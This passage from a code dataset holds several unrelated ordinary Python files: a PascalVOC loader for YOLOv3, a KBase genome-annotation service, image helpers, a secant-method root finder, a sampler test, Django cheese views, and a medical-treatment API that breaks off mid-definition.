The image id is used to select the labels that belong to a\n particular image.\n \"\"\"\n f_img = self.list_imgs[index]\n img = cv2.imread(str(f_img))\n img_numpy = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n f_label = self.list_labels[index]\n label = self.read_label(f_label)\n label_numpy = np.array(label, dtype=np.float32)\n\n if self.transform is not None:\n try:\n image, bb_target = self.transform((img_numpy, label_numpy))\n except:\n print(\"Could not apply transform\")\n return\n else:\n image = transforms.ToTensor()(img_numpy)\n label = torch.tensor(label_numpy)\n _, h, w = image.shape\n\n # Convert xyxy (min/max) to xywh\n y_min = label[:, 2]\n x_min = label[:, 1]\n x_max = label[:, 3]\n y_max = label[:, 4]\n bb_target = torch.zeros_like(label)\n bb_target[:, 1] = (x_min + x_max) / 2\n bb_target[:, 2] = (y_min + y_max) / 2\n bb_target[:, 3] = x_max - x_min\n bb_target[:, 4] = y_max - y_min\n\n # to convert absolute coordinated into relative coordinates\n bb_target[:, [1, 3]] /= w\n bb_target[:, [2, 4]] /= h\n\n return image, bb_target\n\n def read_label(self, label):\n ele_obj_list = []\n tree = ET.parse(label)\n root = tree.getroot()\n for _object in root.findall('object'):\n list_obj = []\n ele_obj = _object.find('name').text\n list_obj.append(ele_obj)\n\n bbox = _object.find('bndbox')\n for child in bbox:\n # Iterate over xmin/xmax/ymin/ymax within the xml file\n list_obj.append(int(child.text))\n ele_obj_list.append(list_obj)\n\n # change the sting class value to integer value for it to convert into a tensor\n label_list = []\n for item in ele_obj_list:\n class_str = item[0]\n class_int = self.class_dict[class_str]\n item[0] = class_int\n label_list.append(item)\n return label_list\n\n @staticmethod\n def get_image_list(dir_img):\n img_path = Path(dir_img)\n list_imgs = sorted(img_path.rglob('*.jpg')) # this is called a generator\n if len(list_imgs) == 0:\n raise ValueError(f\"No images found, {dir_img}\")\n return list_imgs\n\n @staticmethod\n def get_label_list(dir_label):\n label_path = Path(dir_label)\n list_labels = sorted(label_path.rglob('*.xml'))\n if len(list_labels) == 0:\n raise ValueError(f\"No images found, {dir_label}\")\n return list_labels\n\n\ndef collate_fn(batch):\n \"\"\"\n The function creates a batch of images and labels.\n We need to use a custom collate func because we cannot directly create a batch of label tensors, since the number\n of bounding boxes per image is different (cannot have tensor of shape BxNx5, because N is variable per image).\n\n Args:\n batch: List of outputs from each dataset instance in Dataloader\n\n Returns:\n Tensor: Image. Shape=[b, c, h, w]\n Tensor: labels. Shape=[N, 6] (img_id, cls_id, x, y, w, h). img_id is in range [0, batch_size].\n \"\"\"\n batch = [data for data in batch if data is not None]\n imgs, bb_targets = list(zip(*batch))\n\n # Resize images to input shape\n imgs = torch.stack([img for img in imgs])\n\n # Add sample index to targets.\n # If each label is shape (N, 5), we concatenate along the 0th axis. 
To distinguish bboxes of different images,\n # we add an image index to the 1st axis.\n for i, boxes in enumerate(bb_targets):\n boxes[:, 0] = i\n bb_targets = torch.cat(bb_targets, 0)\n\n return imgs, bb_targets\n\n\ndef draw_bbox(img, label):\n img_np = (img.numpy() * 255).astype(np.uint8)\n img_np = img_np.transpose((1, 2, 0)) #to change the order of channel\n height, width, _ = img_np.shape\n\n # Convert to absolute coords\n label[:, [2, 4]] *= width\n label[:, [3, 5]] *= height\n\n # Convert to int\n label = label.round().int()\n\n # Convert xywh to xyxy (min/max)\n label_xyxy = utils.xywh_to_xyxy(label)\n\n label_np = label_xyxy.numpy()\n img_opencv = cv2.cvtColor(img_np, cv2.COLOR_RGB2BGR)\n for box in label_np:\n start_point = (box[2], box[3])\n end_point = (box[4], box[5])\n color = (255, 0, 0)\n thickness = 2\n image = cv2.rectangle(img_opencv, start_point, end_point, color, thickness)\n return image\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dir_root\", type=Path, required=True,\n help=\"Root directory for train. Contains the VOCdevkit dir\")\n args = parser.parse_args()\n\n dir_root = args.dir_root\n if not dir_root.is_dir():\n raise ValueError(f\"Not a directory: {dir_root}\")\n\n dataset = PascalVOC(dir_root, transform=get_transforms(img_size=416))\n print(\"Size of dataset: \", len(dataset))\n\n training_generator = torch.utils.data.DataLoader(dataset, batch_size=2, shuffle=False, collate_fn=collate_fn)\n\n for idx, batch in enumerate(training_generator):\n images, labels = batch\n\n img_bbox = []\n for img_idx, img in enumerate(images):\n # single image and its label\n label_xyxy = utils.select_bbox_from_img_id(labels, img_idx)\n\n img = draw_bbox(img, label_xyxy)\n img_bbox.append(img)\n\n concat_img = np.concatenate(img_bbox, axis=1)\n cv2.imwrite(f\"output/dataset_sample_batch_{idx}.jpg\", concat_img)\n\n if idx >= 1:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samiksha-singh/my_pytorch_exercises","sub_path":"yolov3_samiksha/dataset_Pascal.py","file_name":"dataset_Pascal.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
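The collate trick in the record above (variable-length `[N, 5]` targets concatenated into one `[N, 6]` tensor, with the first column tagging the owning image) can be shown in isolation. A minimal sketch with toy tensors, not the real dataset:

```python
import torch

# Toy targets: image 0 has 2 boxes, image 1 has 3 - default_collate would fail on this.
targets = [torch.zeros(2, 6), torch.zeros(3, 6)]
for i, boxes in enumerate(targets):
    boxes[:, 0] = i          # first column tags each row with its image index

batch_targets = torch.cat(targets, 0)   # shape [5, 6] instead of an impossible [2, N, 6]
print(batch_targets[:, 0])  # tensor([0., 0., 1., 1., 1.])
```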
+{"seq_id":"31264177106","text":"# -*- coding: utf-8 -*-\n#BEGIN_HEADER\n\nimport os\nimport sys\nimport shutil\nimport traceback\nimport uuid\nfrom pprint import pprint, pformat\n\nfrom biokbase.workspace.client import Workspace\n\n# utilities for unpacking things- could switch to functions in DataFileUtil when available\nimport biokbase.Transform.script_utils as script_utils\n\nimport trns_transform_Genbank_Genome_to_KBaseGenomeAnnotations_GenomeAnnotation as uploader\nfrom DataFileUtil.DataFileUtilClient import DataFileUtil\n\n# For Genome to genbank downloader\nfrom doekbase.data_api.downloaders import GenomeAnnotation\nfrom doekbase.data_api.annotation.genome_annotation.api import GenomeAnnotationAPI as GenomeAnnotationAPI\n\n#END_HEADER\n\n\nclass GenomeAnnotationFileUtil:\n '''\n Module Name:\n GenomeAnnotationFileUtil\n\n Module Description:\n \n '''\n\n ######## WARNING FOR GEVENT USERS #######\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n #########################################\n VERSION = \"0.0.1\"\n GIT_URL = \"https://github.com/rsutormin/GenomeAnnotationFileUtil\"\n GIT_COMMIT_HASH = \"60583507a89da477f8e7b50cfc69c387a6874728\"\n \n #BEGIN_CLASS_HEADER\n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n self.workspaceURL = config['workspace-url']\n self.shockURL = config['shock-url']\n self.handleURL = config['handle-service-url']\n self.sharedFolder = config['scratch']\n self.callback_url = os.environ['SDK_CALLBACK_URL']\n self.services = {\n \"workspace_service_url\": self.workspaceURL,\n \"shock_service_url\": self.shockURL,\n \"handle_service_url\": self.handleURL\n }\n #END_CONSTRUCTOR\n pass\n \n\n def genbank_to_genome_annotation(self, ctx, params):\n \"\"\"\n :param params: instance of type \"GenbankToGenomeAnnotationParams\"\n (file_path or shock_id -- Local path or shock_id of the uploaded\n file with genome sequence in GenBank format or zip-file with\n GenBank files. genome_name -- The name you would like to use to\n reference this GenomeAnnotation. If not supplied, will use the\n Taxon Id and the data source to determine the name. taxon_wsname -\n name of the workspace containing the Taxonomy data, defaults to\n 'ReferenceTaxons') -> structure: parameter \"file_path\" of String,\n parameter \"shock_id\" of String, parameter \"ftp_url\" of String,\n parameter \"genome_name\" of String, parameter \"workspace_name\" of\n String, parameter \"source\" of String, parameter \"taxon_wsname\" of\n String, parameter \"convert_to_legacy\" of type \"boolean\" (A boolean\n - 0 for false, 1 for true. @range (0, 1))\n :returns: instance of type \"GenomeAnnotationDetails\" -> structure:\n parameter \"genome_annotation_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: details\n #BEGIN genbank_to_genome_annotation\n\n print('genbank_to_genome_annotation -- paramaters = ')\n pprint(params)\n\n # validate input and set defaults. 
Note that because we don't call the uploader method\n # as a stand alone script, we do the validation here.\n if 'workspace_name' not in params:\n raise ValueError('workspace_name field was not defined')\n workspace_name = params['workspace_name']\n\n if 'genome_name' not in params:\n raise ValueError('genome_name field was not defined')\n genome_name = params['genome_name']\n\n source = 'Genbank'\n if 'source' in params:\n source = source;\n\n taxon_wsname = 'ReferenceTaxons'\n if 'taxon_wsname' in params:\n taxon_wsname = params['taxon_wsname']\n\n # other options to handle\n # release\n # taxon_reference\n # exclude_feature_types\n # type\n\n\n # construct the input directory where we stage files\n input_directory = os.path.join(self.sharedFolder, 'genome-upload-staging-'+str(uuid.uuid4()))\n os.makedirs(input_directory)\n\n # determine how to get the file: if it is from shock, download it. If it\n # is just sitting there, then use it. Move the file to the staging input directory\n\n genbank_file_path = None\n\n if 'file_path' not in params:\n if 'shock_id' not in params:\n if 'ftp_url' not in params:\n raise ValueError('No input file (either file_path, shock_id, or ftp_url) provided')\n else:\n # TODO handle ftp - this creates a directory for us, so update the input directory\n print('calling Transform download utility: script_utils.download');\n print('URL provided = '+params['ftp_url']);\n script_utils.download_from_urls(\n working_directory = input_directory,\n token = ctx['token'], # not sure why this requires a token to download from a url...\n urls = {\n 'ftpfiles': params['ftp_url']\n }\n );\n input_directory = os.path.join(input_directory,'ftpfiles')\n # unpack everything in input directory\n dir_contents = os.listdir(input_directory)\n print('downloaded directory listing:')\n pprint(dir_contents)\n dir_files = []\n for f in dir_contents:\n if os.path.isfile(os.path.join(input_directory, f)):\n dir_files.append(f)\n\n print('processing files in directory...')\n for f in dir_files:\n # unpack if needed using the standard transform utility\n print('unpacking '+f)\n script_utils.extract_data(filePath=os.path.join(input_directory,f))\n\n else:\n # handle shock file\n dfUtil = DataFileUtil(self.callback_url, token=ctx['token'])\n file_name = dfUtil.shock_to_file({\n 'file_path': input_directory,\n 'shock_id': params['shock_id']\n })['node_file_name']\n genbank_file_path = os.path.join(input_directory, file_name)\n else:\n # copy the local file to the input staging directory\n # (NOTE: could just move it, but then this method would have the side effect of moving your\n # file which another SDK module might have an open handle on)\n local_file_path = params['file_path']\n genbank_file_path = os.path.join(input_directory, os.path.basename(local_file_path))\n shutil.copy2(local_file_path, genbank_file_path)\n\n if genbank_file_path is not None:\n print(\"input genbank file =\" + genbank_file_path)\n\n # unpack if needed using the standard transform utility\n script_utils.extract_data(filePath=genbank_file_path)\n\n # do the upload (doesn't seem to return any information)\n uploader.upload_genome(\n logger=None,\n\n shock_service_url = self.shockURL,\n handle_service_url = self.handleURL,\n workspace_service_url = self.workspaceURL,\n\n input_directory=input_directory,\n\n workspace_name = workspace_name,\n core_genome_name = genome_name,\n source = source,\n taxon_wsname = taxon_wsname\n )\n\n #### Code to convert to legacy type if requested\n if 'convert_to_legacy' in params and 
params['convert_to_legacy']==1:\n from doekbase.data_api.converters import genome as cvt\n print('Converting to legacy type, object={}'.format(genome_name))\n cvt.convert_genome(\n shock_url=self.shockURL,\n handle_url=self.handleURL,\n ws_url=self.workspaceURL,\n obj_name=genome_name,\n ws_name=workspace_name)\n\n # clear the temp directory\n shutil.rmtree(input_directory)\n\n # get WS metadata to return the reference to the object (could be returned by the uploader method...)\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref':workspace_name + '/' + genome_name}],'includeMetadata':0, 'ignoreErrors':0})[0]\n\n details = {\n 'genome_annotation_ref':str(info[6]) + '/' + str(info[0]) + '/' + str(info[4])\n }\n\n\n #END genbank_to_genome_annotation\n\n # At some point might do deeper type checking...\n if not isinstance(details, dict):\n raise ValueError('Method genbank_to_genome_annotation return value ' +\n 'details is not type dict as required.')\n # return the results\n return [details]\n\n def genome_annotation_to_genbank(self, ctx, params):\n \"\"\"\n :param params: instance of type \"GenomeAnnotationToGenbankParams\"\n (genome_ref -- Reference to the GenomeAnnotation or Genome object\n in KBase in any ws supported format OR genome_name +\n workspace_name -- specifiy the genome name and workspace name of\n what you want. If genome_ref is defined, these args are ignored.\n new_genbank_file_name -- specify the output name of the genbank\n file, optional save_to_shock -- set to 1 or 0, if 1 then output is\n saved to shock. default is zero) -> structure: parameter\n \"genome_ref\" of String, parameter \"genome_name\" of String,\n parameter \"workspace_name\" of String, parameter\n \"new_genbank_file_name\" of String, parameter \"save_to_shock\" of\n type \"boolean\" (A boolean - 0 for false, 1 for true. @range (0, 1))\n :returns: instance of type \"GenbankFile\" -> structure: parameter\n \"path\" of String, parameter \"shock_id\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: file\n #BEGIN genome_annotation_to_genbank\n\n print('genome_annotation_to_genbank -- paramaters = ')\n pprint(params)\n\n service_endpoints = {\n \"workspace_service_url\": self.workspaceURL, \n \"shock_service_url\": self.shockURL,\n \"handle_service_url\": self.handleURL\n }\n\n # parse/validate parameters. could do a better job here.\n genome_ref = None\n if 'genome_ref' in params and params['genome_ref'] is not None:\n genome_ref = params['genome_ref']\n else:\n if 'genome_name' not in params:\n raise ValueError('genome_ref and genome_name are not defined. One of those is required.')\n if 'workspace_name' not in params:\n raise ValueError('workspace_name is not defined. This is required if genome_name is specified' +\n ' without a genome_ref')\n genome_ref = params['workspace_name'] + '/' + params['genome_name']\n\n # do a quick lookup of object info- could use this to do some validation. Here we need it to provide\n # a nice output file name if it is not set... 
We should probably catch errors here and print out a nice\n # message - usually this would mean the ref was bad.\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref':genome_ref}],'includeMetadata':0, 'ignoreErrors':0})[0]\n print('resolved object to:');\n pprint(info)\n\n if 'new_genbank_file_name' not in params or params['new_genbank_file_name'] is None:\n new_genbank_file_name = info[1] + \".gbk\"\n else:\n new_genbank_file_name = params['new_genbank_file_name']\n\n\n # construct a working directory to hand off to the data_api\n working_directory = os.path.join(self.sharedFolder, 'genome-download-'+str(uuid.uuid4()))\n os.makedirs(working_directory)\n output_file_destination = os.path.join(working_directory,new_genbank_file_name)\n\n # do it\n print('calling: doekbase.data_api.downloaders.GenomeAnnotation.downloadAsGBK');\n GenomeAnnotation.downloadAsGBK(\n genome_ref,\n service_endpoints,\n ctx['token'],\n output_file_destination,\n working_directory)\n\n # if we need to upload to shock, well then do that too.\n file = {}\n if 'save_to_shock' in params and params['save_to_shock'] == 1:\n dfUtil = DataFileUtil(self.callback_url, token=ctx['token'])\n file['shock_id'] =dfUtil.file_to_shock({\n 'file_path':output_file_destination,\n 'gzip':0,\n 'make_handle':0\n #attributes: {} #we can set shock attributes if we want\n })['shock_id']\n else:\n file['path'] = output_file_destination\n\n #END genome_annotation_to_genbank\n\n # At some point might do deeper type checking...\n if not isinstance(file, dict):\n raise ValueError('Method genome_annotation_to_genbank return value ' +\n 'file is not type dict as required.')\n # return the results\n return [file]\n\n def export_genome_annotation_as_genbank(self, ctx, params):\n \"\"\"\n A method designed especially for download, this calls 'genome_annotation_to_genbank' to do\n the work, but then packages the output with WS provenance and object info into\n a zip file and saves to shock.\n :param params: instance of type \"ExportParams\" -> structure:\n parameter \"input_ref\" of String\n :returns: instance of type \"ExportOutput\" -> structure: parameter\n \"shock_id\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN export_genome_annotation_as_genbank\n\n # validate parameters\n if 'input_ref' not in params:\n raise ValueError('Cannot export GenomeAnnotation- not input_ref field defined.')\n\n # get WS metadata to get ws_name and obj_name\n ws = Workspace(url=self.workspaceURL)\n info = ws.get_object_info_new({'objects':[{'ref': params['input_ref'] }],'includeMetadata':0, 'ignoreErrors':0})[0]\n\n # export to a file\n file = self.genome_annotation_to_genbank(ctx, { \n 'genome_ref': params['input_ref'], \n 'new_genbank_file_name': info[1]+'.gbk' })[0]\n\n # create the output directory and move the file there\n export_package_dir = os.path.join(self.sharedFolder, info[1])\n os.makedirs(export_package_dir)\n shutil.move(file['path'], os.path.join(export_package_dir, os.path.basename(file['path'])))\n\n # package it up and be done\n dfUtil = DataFileUtil(self.callback_url)\n package_details = dfUtil.package_for_download({\n 'file_path': export_package_dir,\n 'ws_refs': [ params['input_ref'] ]\n })\n\n output = { 'shock_id': package_details['shock_id'] }\n\n #END export_genome_annotation_as_genbank\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method export_genome_annotation_as_genbank return value ' +\n 'output 
is not type dict as required.')\n # return the results\n return [output]\n\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\", 'message': \"\", 'version': self.VERSION, \n 'git_url': self.GIT_URL, 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n","repo_name":"kbaseapps/GenomeAnnotationFileUtil","sub_path":"lib/GenomeAnnotationFileUtil/GenomeAnnotationFileUtilImpl.py","file_name":"GenomeAnnotationFileUtilImpl.py","file_ext":"py","file_size_in_byte":16528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14113767467","text":"from PIL import Image, ExifTags\n\ndef fix_orientation(image):\n \"\"\" Look in the EXIF headers to see if this image should be rotated. \"\"\"\n try:\n for orientation in ExifTags.TAGS.keys():\n if ExifTags.TAGS[orientation] == \"Orientation\":\n break\n exif = dict(image._getexif().items())\n\n if exif[orientation] == 3:\n image = image.rotate(180, expand=True)\n elif exif[orientation] == 6:\n image = image.rotate(270, expand=True)\n elif exif[orientation] == 8:\n image = image.rotate(90, expand=True)\n return image\n except (AttributeError, KeyError, IndexError):\n return image\n\ndef extract_center(image):\n \"\"\" Most of the models need a small square image. Extract it from the center of our image.\"\"\"\n width, height = image.size\n new_width = new_height = min(width, height)\n\n left = (width - new_width) / 2\n top = (height - new_height) / 2\n right = (width + new_width) / 2\n bottom = (height + new_height) / 2\n\n return image.crop((left, top, right, bottom))\n","repo_name":"unofang/KIBICS","sub_path":"dataPreparation/dataClean.py","file_name":"dataClean.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32276456568","text":"from math import *\n\n# input\nep = float(input('nhập vào sai số epsilon = '))\nprint('nhập khoảng cách ly nghiệm (a,b)')\na = float(input('a = '))\nb = float(input('b = '))\ndem = 0\n\ndef f(x): # định nghĩa hàm f(x)\n return log(x)-1\n\nf_a = f(a) \nf_b = f(b)\nS1 = f_a * f_b\n\ndef dx_f(x0): # đạo hàm f'(x)\n return (f(x0+0.00001)-f(x0-0.00001))/(2*0.00001)\n# tính ep0 để thiết lập điều kiện dừng\ndx_fa = dx_f(a)\ndx_fb = dx_f(b)\nS2 = dx_fa * dx_fb\n\nif abs(dx_fa) >= abs(dx_fb): \n Max = abs(dx_fa)\n min = abs(dx_fb)\nelse:\n Max = abs(dx_fb)\n min = abs(dx_fa) \nep0 = (ep*min)/(Max - min)\n\n#kiểm tra xác định dấu không đổi S3 và S2 > 0\ndef dx_dx_f(x): # đạo hàm f''(x)\n return (dx_f(x+0.00001)-dx_f(x-0.00001))/(2*0.00001)\nS3 = dx_dx_f(a)*dx_dx_f(b)\n\nif( S1 < 0 and S2 >0 and S3>0):\n if f_a*dx_dx_f(a) > 0:\n d = a\n x0 = b\n else:\n d = b\n x0 = a\n \n f_x0 = f(x0) \n f_d = f(d) # bước 4\n dx = f_x0*(d-x0)/(f_x0-f_d)\n \n while abs(dx) > ep0:\n x0 += dx\n f_x0 = f(x0)\n f_d = f(d)\n dx = f_x0*(d-x0)/(f_x0-f_d)\n dem +=1\n print(x0)\n \n print('nghiệm x = ',x0,'\\nsố lần lặp = ', dem) \n \nelif (S1==0):\n if a==0: print('nghiệm x = ',a) \n if b==0: print('nghiệm x = ',b) \n \nelse:\n print(\"Khoảng cách ly không hợp lệ, không tồn tại nghiệm duy nhất\")\n","repo_name":"thanthimyhuye2001/1.Hoc_Tap","sub_path":"2.Giai_Tich_So/2. F(X) = 0/2. pp dây cung/code dây cung.py","file_name":"code dây cung.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12637113396","text":"\"\"\"Unit tests for constant prob sampler.\n\nAuthor: Mengye Ren (mren@cs.toronto.edu)\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport unittest\n\nfrom fewshot.data.samplers.constant_prob_sampler import ConstantProbSampler\n\n\nclass Dataset():\n\n def __init__(self, n, m):\n self._cls_dict = self._get_cls_dict(n, m)\n\n def get_cls_dict(self):\n return self._cls_dict\n\n def _get_cls_dict(self, n, m):\n \"\"\"Gets a class dict with n classes and m images per class.\"\"\"\n cls_dict = {}\n counter = 0\n for k in range(n):\n cls_dict[k] = np.arange(counter, counter + m)\n counter += m\n return cls_dict\n\n\nclass ConstantProbSamplerTests(unittest.TestCase):\n\n def test_basic(self):\n n = 10\n m = 10\n sampler = ConstantProbSampler(0)\n sampler.set_dataset(Dataset(n, m))\n s, q = sampler.sample_collection(n, 2, p=0.3)\n print(s)\n print(q)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"renmengye/oc-fewshot-public","sub_path":"fewshot/data/samplers/constant_prob_sampler_tests.py","file_name":"constant_prob_sampler_tests.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"71"}
+{"seq_id":"41302988287","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import Cheese\n\n\nclass CheeseListView(ListView):\n \"\"\"View of Cheese list\"\"\"\n model = Cheese\n\n\nclass CheeseDetailView(DetailView):\n \"\"\"View of Cheese Detail\"\"\"\n model = Cheese\n\n\nclass CheeseCreateView(LoginRequiredMixin, CreateView):\n \"\"\"View of Create Cheese\"\"\"\n model = Cheese\n fields = ['name', 'description', 'firmness', 'country_of_origin']\n\n def form_valid(self, form):\n \"\"\"Form validation for Add Cheese form.\"\"\"\n form.instance.creator = self.request.user\n return super().form_valid(form)\n","repo_name":"tstefanovska/everycheese","sub_path":"everycheese/cheeses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4257766183","text":"# -*- coding:utf-8 -*-\n\n'''\nCreated on 14/02/2014\n\n@author: Capi\n'''\n\nimport endpoints\nfrom google.appengine.ext import ndb\nfrom protorpc import remote, message_types, messages\n\nfrom api import treatments_messages\nfrom api.treatments_messages import MappedObjectMsg, EntireTreatment, \\\n TreatmentsCollection, DiaryFulfillmentCollectionMsg, ChartPoint, ChartData\nfrom models import *\n\n\n@endpoints.api(name=\"doctor\", version=\"v1\",\n description=\"API for doctor users.\")\nclass ForDoctors(remote.Service):\n\n # Resource Containers\n\n KEY_CONTAINER = endpoints.ResourceContainer(ekey=messages.StringField(1))\n ID_CONTAINER = endpoints.ResourceContainer(id=messages.StringField(1))\n\n ACTION_REQUEST_PARAMS = endpoints.ResourceContainer(fulfillments_range_init=messages.IntegerField(1),\n fulfillments_range_finish=messages.IntegerField(2),\n ekey=messages.StringField(4)\n )\n\n @endpoints.method(treatments_messages.PatientMsg, treatments_messages.PatientMsg,\n path=\"patient\", http_method=\"POST\", name=\"patient.save\")\n def patient_save(self, patient_msg):\n\n patient = Patient(message=patient_msg, parent=ndb.Key(urlsafe=patient_msg.doctor_key))\n patient.put()\n\n patient_msg = patient.to_message(ignore_fields=('doctor_key',))\n\n return patient_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.PatientMsg,\n path=\"patient/get\", http_method=\"GET\", name=\"patient.details\")\n def patient_details(self, request):\n\n patient = ndb.Key(urlsafe=request.ekey).get()\n\n patient_msg = patient.to_message()\n\n return patient_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.TreatmentsCollection,\n path=\"patient/treatments\", http_method=\"GET\", name=\"patient.treatments\")\n def patient_treatments(self, request):\n\n patient_key = ndb.Key(urlsafe=request.ekey)\n treatments = Treatment.query(ancestor=patient_key)\n\n treatments_msgs = []\n\n for t in treatments:\n treatments_msgs.append(t.to_message())\n\n return TreatmentsCollection(treatments=treatments_msgs)\n\n # --------------- Treatments ---------------\n\n @endpoints.method(treatments_messages.TreatmentMsg, treatments_messages.TreatmentMsg,\n path=\"treatment\", http_method=\"POST\", name=\"treatment.save\")\n def treatment_save(self,treatment_msg):\n\n treatment = Treatment(message=treatment_msg, parent=ndb.Key(urlsafe=treatment_msg.patient_key))\n treatment.put()\n treatment.generate_code()\n treatment.is_active = True\n treatment.made_actions_count = 0\n treatment.past_actions_count = 0\n treatment.put()\n\n last_finish_date = None\n\n for a in treatment_msg.actions:\n action = TreatmentAction(message=a, parent=treatment.key)\n action.made_count = 0\n action.past_count = 0\n action.put()\n a.key = action.key.urlsafe()\n\n if (last_finish_date == None):\n last_finish_date = action.finish_date\n else:\n last_finish_date = action.finish_date if action.finish_date > last_finish_date else last_finish_date\n\n treatment.finish_date = last_finish_date\n treatment.put()\n\n treatment_msg = treatment.to_message()\n\n return treatment_msg\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.EntireTreatment,\n path=\"treatment/details\", http_method=\"GET\", name=\"treatment.details\")\n def treatment_details(self,request):\n\n treatment = ndb.Key(urlsafe=request.ekey).get()\n patient = treatment.key.parent().get()\n\n treatment_msg = treatment.to_message()\n treatment_msg.actions = treatment.get_actions_messages()\n\n for action_msg in treatment_msg.actions:\n\n action 
= TreatmentAction(action_msg)\n\n if (action_msg.measurement): # Revisar por qué no funciona isMeasurement\n action_msg.measurement.chart_data = ChartData(points=[])\n chart_points = []\n\n # Cumplimiento realizados para ser graficados\n fulfillments = Fulfillment.query(ancestor=ndb.Key(urlsafe=action_msg.key)).filter(Fulfillment.decision=='T').order(Fulfillment.for_moment)\n\n for f in fulfillments:\n point = ChartPoint(value=float(f.value), tag=str(f.action_moment))\n chart_points.append(point)\n\n action_msg.measurement.chart_data = ChartData(points=chart_points)\n\n treatment_details = EntireTreatment(treatment=treatment_msg, patient=patient.to_message())\n\n return treatment_details\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.DiaryFulfillmentCollectionMsg,\n path=\"treatment/diary_fullfilments\", http_method=\"GET\", name=\"treatment.diary_fulfillments\")\n def diary_fulfillments(self, request):\n\n response = DiaryFulfillmentCollectionMsg()\n\n treatment_key = ndb.Key(urlsafe=request.ekey)\n\n result = DiaryFulfillment.query(ancestor=treatment_key).order(DiaryFulfillment.day)\n\n for r in result:\n response.diary_fulfillments.append(r.to_message())\n\n return response\n\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.TreatmentsCollection,\n path=\"treatments\", http_method=\"GET\", name=\"treatments.actives\")\n def treatments(self, request):\n\n treatments = Treatment.get_actives_by_doctor(ndb.Key(urlsafe=request.ekey))\n\n treatments_msg = []\n\n for t in treatments:\n treatments_msg.append(t.to_message(with_patient=True))\n\n return TreatmentsCollection(treatments=treatments_msg)\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.ChartData,\n path=\"treatment/measurement/behavior\", http_method=\"GET\", name=\"treatments.measurement.behavior\")\n def measurement_behavior(self, request):\n\n chart_points = []\n\n fulfillments = Fulfillment.query(ancestor=ndb.Key(urlsafe=request.ekey))\n\n for f in fulfillments:\n point = ChartPoint(value=f.value, tag=str(f.day))\n chart_points.append(point)\n\n return ChartData(points=chart_points)\n\n\n @endpoints.method(treatments_messages.MedicamentMsg, treatments_messages.MedicamentMsg,\n path=\"medicament\", http_method=\"POST\", name=\"medicament.save\")\n def medicament_save(self, medicament_msg):\n\n medicament = Medicament(message=medicament_msg)\n medicament.put()\n\n medicament_msg.key = medicament.key.urlsafe()\n\n return medicament_msg\n\n @endpoints.method(message_types.VoidMessage, treatments_messages.Presentations,\n path=\"presentations\", http_method=\"GET\", name=\"presentations.all\")\n def presentations(self, request):\n\n items = [\n MappedObjectMsg(description='Tabletas', for_db='t'),\n MappedObjectMsg(description='Cápsulas'.decode('utf-8'), for_db='c'),\n MappedObjectMsg(description='Jarabe', for_db='j'),\n MappedObjectMsg(description='Ampolla', for_db='a'),\n MappedObjectMsg(description='Inyección'.decode('utf-8'), for_db='i')\n ]\n\n return treatments_messages.Presentations(presentations=items)\n\n @endpoints.method(message_types.VoidMessage, treatments_messages.MedicamentsCollection,\n path=\"medicaments\", http_method=\"GET\", name=\"medicaments.all\")\n def medicaments(self, request):\n\n medicament_msgs = []\n\n medicaments = Medicament.query()\n\n for m in medicaments:\n medicament_msgs.append(m.to_message())\n\n return treatments_messages.MedicamentsCollection(medicaments=medicament_msgs)\n\n @endpoints.method(KEY_CONTAINER, treatments_messages.PatientsCollection,\n path=\"patients\", 
